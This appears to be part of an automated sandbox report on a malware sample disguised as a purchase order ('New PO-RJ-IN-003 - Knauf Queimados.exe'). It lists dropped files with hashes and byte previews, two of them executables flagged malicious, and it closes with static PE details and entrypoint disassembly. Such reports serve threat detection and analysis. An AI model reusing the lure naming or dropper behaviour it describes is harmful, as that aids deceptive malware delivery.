SHA-512:	25FFAE39FE38336C06B08169C325B91D7CF4F1706348BAF060905D06EC6D1AB538D79284835EFD2ECADD0D54747F704DE17F7B3A5875E4D86871B6A7578FF735
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.2.0.4.0.1.2.7.8.8.3.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.2.0.4.0.2.7.7.8.8.1.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.b.3.4.2.0.2.-.4.4.b.5.-.4.d.b.7.-.9.f.b.7.-.8.c.0.a.0.c.0.e.a.2.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.0.2.4.8.2.6.1.-.7.9.5.0.-.4.4.a.c.-.9.5.6.a.-.2.d.b.b.6.8.1.b.a.e.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.b.t.h.q.n.w.y.f.u.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.b.0.-.0.0.0.1.-.0.0.1.9.-.2.8.8.1.-.7.1.0.b.2.1.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.6.1.2.6.1.e.6.4.c.7.d.b.d.3.f.3.f.b.2.4.a.d.3.1.c.c.6.2.2.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.d.5.0.b.c.8.8.3.4.7.5.8.e.1.5.8.3.a.e.e.7.2.9.b.6.c.1.4.8.e.4.8.4.9.9.6.7.0.9.7.!.r.u.b.t.h.q.n.w.y.f.u.e...e.x.e.....T.a.r.g.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rubthqnwyfue.exe_1078f5d9a12c4fe091b0b1b063f9270e1879244_c652c34e_15731f22\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8330437811334652
Encrypted:	false
SSDEEP:	96:NF4F7bmMbhHJ76f5pXIQcQvc6QcEDMcw3DD+HbHgE+5JHQ0DFF8WpsvVv05omZtv:NOUJHBUZMXgjkJq/u7sdS274It0
MD5:	EA4872801B7758ABB5B9724582927345
SHA1:	C8A3B4E7DA468965CE8EFDE4B9AFA0897DDA8C19
SHA-256:	623023C565AA132FE1174E1E1774BCE708E94940B1FBD45464DB6280EEC15CB0
SHA-512:	C81CF8AC5D1A18C906D967B466550CF69A3CFD3D0B7FD6887AA25C87235C6BBD64665C3B4D006FEBC73A9B93230F3258D96C39EB9A0B4A38D78FEADE6FA45DB0
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.2.0.4.0.6.6.9.1.4.0.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.2.0.4.0.8.2.3.8.2.7.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.7.8.1.7.5.3.-.9.9.9.b.-.4.2.1.3.-.a.d.3.5.-.8.7.5.2.a.e.d.a.c.2.4.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.8.6.e.b.7.e.-.7.d.8.c.-.4.3.c.f.-.b.5.0.a.-.a.f.4.a.3.0.b.1.e.9.c.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.b.t.h.q.n.w.y.f.u.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.9.8.-.0.0.0.1.-.0.0.1.9.-.3.9.0.c.-.9.a.1.0.2.1.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.6.1.2.6.1.e.6.4.c.7.d.b.d.3.f.3.f.b.2.4.a.d.3.1.c.c.6.2.2.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.d.5.0.b.c.8.8.3.4.7.5.8.e.1.5.8.3.a.e.e.7.2.9.b.6.c.1.4.8.e.4.8.4.9.9.6.7.0.9.7.!.r.u.b.t.h.q.n.w.y.f.u.e...e.x.e.....T.a.r.g.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1493.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Nov 29 18:33:27 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	38124
Entropy (8bit):	2.1135243060973754
Encrypted:	false
SSDEEP:	192:lJLLUnttqrOI5vBZrWYMkumjuFCl/wXEX7:bciyILRXMkumj/loE
MD5:	4BB1A8465A8E8CC0512777E6E2FCACF2
SHA1:	D0AB572DED8BD72E988B0EF7ABCDD5A061DCE1BB
SHA-256:	73D48BEA30E4D193508EF8C7DDFED7527CF3CED302B7EF0A5B232932B321B850
SHA-512:	F279B695567203BE277AE105A636163EC2F41B900E94CD934FA26ABE19EA912D755C3F144DF4F4FC044639F2AC5CA10446A1793BF1EDFDC29A9577836C96F201
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......wP.c.........................................%..........T.......8...........T............................................................................................................U...........B......8.......GenuineIntelW...........T...........tP.c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1753.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8316
Entropy (8bit):	3.6971504734754745
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi1h6+kGE76YBScSUvgmfYSSCprm89bPRsf6lm:RrlsNiz6+kGE76YBZSUvgmfYSlPKfx
MD5:	0C2AA2BEACEC714648312E4758CC6398
SHA1:	D0B12EB6E0D73080570C74BD6A89A128619D448E
SHA-256:	8F1FBF663B7649EEC73BBA5BE84352F37F68EEB7D56824A84070722740305BDE
SHA-512:	3B0E18674E59C84C89F875D8CE6E66F0A943EC0498DEA85B41FF28AEE60C620CBBF4E337333BC6E10F30F248878F4D8DE160C404F5228FBAD6D93F6CA0319A09
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.4.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1810.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4577
Entropy (8bit):	4.456911385463713
Encrypted:	false
SSDEEP:	48:cvIwSD8zsqrJgtWI9syWgc8sqYjG8fm8M4JhhYM7aFAO+q8AxF/ucnLGq3131d:uITfqFvTgrsqYXJhh9fOxxAcnLz3131d
MD5:	787E667FEA93058BAABB354313A383EA
SHA1:	EBE6B5FEF5282B1A9C48E51A4009C84BB7F60EBA
SHA-256:	DA14B3F4C5FE0CAB3583006C73483CEB04A9ADE3558750569B8BBD30C0EB2DCA
SHA-512:	033E73DCB8DDB5BA108A6D6693EA53E19F8B07D44BD7EEB5D504C0518B34C7F80AD5EB76A73E3D4F00F3CF23016F426F9BF0256B00E2668EEE546203968219C9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1801664" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER206.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8304
Entropy (8bit):	3.699302336059976
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi2c6enNL0xq6YBSLSUKgmfYSSCprJ89b5ksfY+zm:RrlsNit6ENL0xq6YBuSUKgmfYSc5XfYL
MD5:	34D0C29EDEB9291888F5D1A50A014FEF
SHA1:	B7821B75BDF77EB93EA9A6F46BD51D9D9A3415FE
SHA-256:	A4A9F780CABA96FAF2230242D42E1DBD129EF0EA355A35805CC8F18D9B61900E
SHA-512:	87A94E5F65571D28D1B4189AE52E5E82AC7C6C14967B2DDD098B5010745B57CAC979A3AA1AC3B041B0B87CF2F871F38568D6229D93378E43E7D042763CFC32E8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.4.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A3.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4577
Entropy (8bit):	4.457629089404613
Encrypted:	false
SSDEEP:	48:cvIwSD8zsqrJgtWI9syWgc8sqYj18fm8M4JhhYM7aFz2+q8AxF/5LGq3139d:uITfqFvTgrsqYGJhh9A2xxLLz3139d
MD5:	62377028B54AEE8D136411AB5EABFB35
SHA1:	4CA2C3D9E7E1DE5292BFCB850BF09CD0E785DD0C
SHA-256:	5E5B155E3AE0838AD92071C53510DF5BC0F8169EE6224BC2BB757C7D67858150
SHA-512:	DB093BCC43A7707163F531332DE4AEFAE40A992EE1D4041499318DAD730A8A9FA6422AFDE03F2E2CEC764EC6DD5AB3CD804BFC22A0EDEA4F8C1588793A132186
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1801664" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF75.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Nov 29 18:33:21 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	40132
Entropy (8bit):	2.0040008468253996
Encrypted:	false
SSDEEP:	192:zbmX3FvVpOc5NcFNwpPsf1TFC9GrEBopK:+licrcFNyPs9TjK
MD5:	106AFACC119E90AC953EEABE57CEA3B4
SHA1:	A6ABBED87500BFE854024C5341771C65692FD7FD
SHA-256:	38475C67FD546492D1F7D6D3350CD6F329A101B380E26B2FEC0ED5D67253751B
SHA-512:	3071D8D628D6CC3E0AD05BFD4F1CE80A235CF444CD4966B52E3173C31DC0220150A947B74FF027C879735F865C8D7ABE202F91194415ADBB2E504F94FDFE94FA
Malicious:	false
Preview:	MDMP....... .......qP.c........................................p&..........T.......8...........T........... ............... ................................................................................U...........B..............GenuineIntelW...........T...........kP.c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\456b6ELMQ

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.287139506398081
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
MD5:	292F98D765C8712910776C89ADDE2311
SHA1:	E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
SHA-256:	9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
SHA-512:	205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eojsm.wx

Download File

Process:	C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.998554091662563
Encrypted:	true
SSDEEP:	3072:SWMXxgX4d9iRFy0ALl5gXs0CQ1/zhvFpalFNTTzVhqOD/AKuhoTQnnEftVzJJ1IA:RMGFKLl5As+zhGXlYAuhXnnEjFic
MD5:	8C5E7C152ED8F18A0B9DE322E94A3CE2
SHA1:	35C05FA705DC9E6C1998F53F248E0332BC4FB0E2
SHA-256:	B0950EC5415DCFC9BF3394770C2071FAD57B1A02E28416E5E41C3B13266A720A
SHA-512:	0A42DAC7F56CF6B765A52F230C3F1539940F0D507D8CE1C928D89D12BF675F3C41B7B9D9FA10A693ECE96A281DBD8E83D481D310F5CA57812FB979DF34A69CA2
Malicious:	false
Preview:	..{;_....].3.P NZ.l.3...y.GJs'.j.S+.<ERq.?...$...C.... v....W......=D@.g..K..s...J......D..Y.].vM...HG..../.....2F.%R..~...c.4.!.Y+..oj......3q6.40...&...P..>Zb=d.A+.a... .w"b}...VAzL.uDJ..Q.3.i....x..7\|.a..N..Km..A..7%.(.[....;Ph.....O.....R.GO.@.V_..:){}d_.....lk.....O..:.'..SD.<ER..?Y..$...x.... v.(...T...2K.e9..u..oo.....2J......`.u\.>.t+s..r..2....4fD..3R..~.......<....N...uM#..L=.{. ....!.......7...V.}#.. .w"b}....C.L.uOG<.r..3...x..7\|...c..8.K$.....7%.(.......Ph....O......G..@.V_...){}d_.....lkc....O..Js'.j.S+.<ERq.?...$...C.... v.(...T...2K.e9..u..oo.....2J......`.u\.>.t+s..r..2....4fD..3R..~.......<....N...uM#..L=.{. ....!.......7...V.}#.. .w"b}...VAzL.uaz.r..3.sK...x..7\|...c..8.Km..A..7%.(.......Ph....O......G..@.V_...){}d_.....lkc....O..Js'.j.S+.<ERq.?...$...C.... v.(...T...2K.e9..u..oo.....2J......`.u\.>.t+s..r..2....4fD..3R..~.......<....N...uM#..L=.{. ....!.......7...V.}#.. .w"b}...VAzL.uaz.r..3.sK...x..7\|...c..8.Km..A..7%.(.

C:\Users\user\AppData\Local\Temp\jaxdij.exe

Download File

Process:	C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	147968
Entropy (8bit):	6.182679953719657
Encrypted:	false
SSDEEP:	3072:jOPPLcLP9kkaQ+nBwmbePxRC/fkBYcgcg7JkWmjwaY4Y4O1JXy:jiLcLP9c/8BZgFLm8FLC
MD5:	2DD6C8B13AE7D028B0047435FF0DCB8A
SHA1:	D50BC8834758E1583AEE729B6C148E4849967097
SHA-256:	01CB657E996E468706F5C733853419678B8294E7F12669C98DB23C1F0D0EFC7A
SHA-512:	B6438EAFA008519CD2113FD113192F2F9F5F05AD5EFBEB08542C800B7E3BD0E7D3DDE83EBBA8A2374E2DF62FED6CC1248B41CE8CEA41BEE256DA8A0B25FCAF2C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 12%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c............................l.............@.......................................@.........................................................................................................`...................\|............................text............................... ..`.rdata..$t.......v..................@..@.data....%...@......................@....00cfg.......p.......&..............@..@.voltbl."............(...................rsrc................*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsqB9A3.tmp

Download File

Process:	C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
File Type:	COM executable for DOS
Category:	dropped
Size (bytes):	353762
Entropy (8bit):	7.44582442154262
Encrypted:	false
SSDEEP:	6144:dTMGFKLl5As+zhGXlYAuhXnnEjFiREKiLcLP9c/8BZgFLm8FLC:dMGgL3As+gSAu8FuEKiLcLPKcWC8c
MD5:	6B34F2B63558A2CC41B3CB5AF526EC23
SHA1:	8877B4A75BD7DD4DE02CC16643E2AA2E0C193D78
SHA-256:	9C8ACF6A541EE2C83930C4CF4D0E682AE8FFDAF4FCC9FDC244ACCF37416F75A8
SHA-512:	B42DEE735681A9A552F5840AF130D483A5BA2E7FBC6233D5747DA45706166F463E6A49979A0D99B8E4B3B7D6E4C729F43735CF8C1A108FC0C5C8D73B0DFC6EBD
Malicious:	true
Preview:	.!......,...................h...T........ .......!..........................................................................................................................................................................................................................................J...............r...j...............................................................................................................................r.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\uqnwrddys.k

Download File

Process:	C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
File Type:	data
Category:	dropped
Size (bytes):	7706
Entropy (8bit):	6.249721264956451
Encrypted:	false
SSDEEP:	192:xgj/PNnh4pnxYvcIrL+S3yfMae9h4OLzHUphGmKN33w2:xgjnI1xYvReS3yctzHIpKN1
MD5:	A342BD922F1907E57D17E98F522B64EF
SHA1:	934596A7680633634741A445C5D9E0BDCF9C3D8F
SHA-256:	1C1AD949B639CDD656A62B398660A1CCEE4A7FC40E1912BF1A5BBAB78E51B176
SHA-512:	6527A40317BC37D0E7274A3880A652E9BD0EE4E874DEF4478493D93BEE7DB4564CAFEC1574E8605945758963945AADC1D3219410CB877E0C331CECA6671A06AE
Malicious:	false
Preview:	.....(s............\|I...(s............7....z...gT.....7..T.....56/J.......7.R......BC.S...L.E.C.V..Jg.7.56/J......(s............\|,........gT......"..D.<.T.'.KI.TKI....'....gT....g:.~....g....D.........7.56/J.....................M.......=.....\|.E......'.gT.{..Z.M....'..z....7....T561KJ...'..].$....M.........(s............\|,.s>..7.......<../..9.7....9.7"......9gT.1.'..M.'..]x.]..J"{....U.T.]..J2..B..U"{.....6.]D..F.I..D..=7...../..M......./....<.'.._.T...T.561KJ.......7.R......BC.S......L.E.C.]..Jg.7.56/J.........."..",..'@.." ."...'F."3..':."$..'8."+..'>."...'<...'."(...'..T./....D..........'........,.i>......,..P...@.D....,..........,..O...'....,..X...'..~...,.....'......,......'......,..>...'.......7..'..>..........,...."..".,.....7........."......g..5".,...ES......'.gT.........gT.....,...."..".,....7.......'...7....gT.......I...T561KJ..............".."...g...."...g....."...g.....".."...g....."...g2...."'..g0...."

C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jaxdij.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	147968
Entropy (8bit):	6.182679953719657
Encrypted:	false
SSDEEP:	3072:jOPPLcLP9kkaQ+nBwmbePxRC/fkBYcgcg7JkWmjwaY4Y4O1JXy:jiLcLP9c/8BZgFLm8FLC
MD5:	2DD6C8B13AE7D028B0047435FF0DCB8A
SHA1:	D50BC8834758E1583AEE729B6C148E4849967097
SHA-256:	01CB657E996E468706F5C733853419678B8294E7F12669C98DB23C1F0D0EFC7A
SHA-512:	B6438EAFA008519CD2113FD113192F2F9F5F05AD5EFBEB08542C800B7E3BD0E7D3DDE83EBBA8A2374E2DF62FED6CC1248B41CE8CEA41BEE256DA8A0B25FCAF2C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 12%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c............................l.............@.......................................@.........................................................................................................`...................\|............................text............................... ..`.rdata..$t.......v..................@..@.data....%...@......................@....00cfg.......p.......&..............@..@.voltbl."............(...................rsrc................*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.365597808064567
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	New PO-RJ-IN-003 - Knauf Queimados.exe
File size:	405670
MD5:	244fc9610f75225aa3dc09958195beb1
SHA1:	ef0d6103d27090fc9d25e3ef3de2e1b6d9670d9c
SHA256:	05cdda3567b913d99627f8e41336404d5830816df65e1001d6b2ad05bd9ed18d
SHA512:	5e37d34becf476a92c2b14917819c9f9366d99313e971554b4a94d4fe09e05a761355033b5bb59faf3d0a1e34621c31891ff4e5656a379aa581792a7ecc82f16
SSDEEP:	6144:hBn7A5jMUCoQUg+p1vrgTr+H9I/LKUsBdVyXMLCMT5u9AG7Nmf:vrZ+1v0TSdcLKj0MLtlu9VNG
TLSH:	9284CFA3F245989ED44202B3846EED342612ADAAA435DD1673E6BC3F79F31831463F17
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.]...RF..RG.pRF.]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

File Icon


Icon Hash:	b4b0c6c6c4dedca3

Static PE Info

General

Entrypoint:	0x40324f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ab6770b0a8635b9d92a5838920cfe770

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+14h], 00409130h
xor esi, esi
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B8h]
call dword ptr [004070B4h]
cmp ax, 00000006h
je 00007F6FC0C9C953h
push ebx
call 00007F6FC0C9F741h
cmp eax, ebx
je 00007F6FC0C9C949h
push 00000C00h
call eax
push 004091E0h
call 00007F6FC0C9F6C2h
push 004091D8h
call 00007F6FC0C9F6B8h
push 004091CCh
call 00007F6FC0C9F6AEh
push 0000000Dh
call 00007F6FC0C9F711h
push 0000000Bh
call 00007F6FC0C9F70Ah
mov dword ptr [00423F84h], eax
call dword ptr [00407034h]
push ebx
call dword ptr [00407270h]
mov dword ptr [00424038h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F538h
call dword ptr [00407160h]
push 004091C0h
push 00423780h
call 00007F6FC0C9F341h
call dword ptr [004070B0h]
mov ebp, 0042A000h
push eax
push ebp
call 00007F6FC0C9F32Fh
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73cc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2d000	0x1d8a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
